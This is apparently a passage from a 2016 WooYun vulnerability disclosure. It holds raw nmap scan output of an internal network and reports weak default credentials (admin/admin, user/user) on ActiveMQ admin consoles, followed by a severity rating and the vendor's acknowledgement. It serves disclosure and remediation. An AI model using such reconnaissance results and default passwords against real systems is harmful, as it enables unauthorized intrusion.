C8:1F:66:ED:F3:52 (Unknown)Nmap scan report for **.**.**.**4Host is up (0.00015s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:23:E9:37:8C:03 (F5 Networks)Nmap scan report for bogon (**.**.**.**5)Host is up (0.00016s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:01:D7:EF:1A:C3 (F5 Networks)Nmap scan report for **.**.**.**6Host is up (0.00014s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:01:D7:EF:1A:C3 (F5 Networks)Nmap scan report for **.**.**.**9Host is up (0.00017s latency).Not shown: 999 filtered portsPORT STATE SERVICE22/tcp open sshMAC Address: F8:0F:41:FA:D2:B2 (Wistron InfoComm(ZhongShan))Nmap scan report for bogon (**.**.**.**48)Host is up (0.000080s latency).All 1000 scanned ports on bogon (**.**.**.**48) are filteredMAC Address: C8:1F:66:CF:53:C3 (Unknown)Nmap scan report for **.**.**.**49Host is up (0.00012s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh443/tcp open httpsMAC Address: 00:0B:AB:53:A9:A9 (Advantech Technology (china) Co.)Nmap scan report for **.**.**.**50Host is up (0.022s latency).Not shown: 997 closed portsPORT STATE SERVICE21/tcp filtered ftp22/tcp filtered ssh23/tcp open telnetMAC Address: 70:7B:E8:E9:F7:B6 (Unknown)Nmap scan report for bogon (**.**.**.**54)Host is up (0.00018s latency).Not shown: 991 closed portsPORT STATE SERVICE22/tcp open ssh25/tcp filtered smtp143/tcp filtered imap443/tcp open https465/tcp filtered smtps587/tcp filtered submission993/tcp filtered imaps995/tcp filtered pop3s3306/tcp filtered mysqlMAC Address: 00:0B:AB:52:FB:75 (Advantech Technology (china) Co.)
几十台内网服务终端存活主机4.外送几个弱口令:ActiveMQ**.**.**.**:8161/admin/http://**.**.**.**:8161/admin/**.**.**.**:8161/admin/密码admin/admin,user/user
千疮百孔
危害等级:中
漏洞Rank:10
确认时间:2016-04-16 00:01
由于对测试业务的安全不够重视,造成测试业务曝出安全漏洞,进而涉及入侵影响到正式业务,感谢路人甲@乌云 和乌云的工作
暂无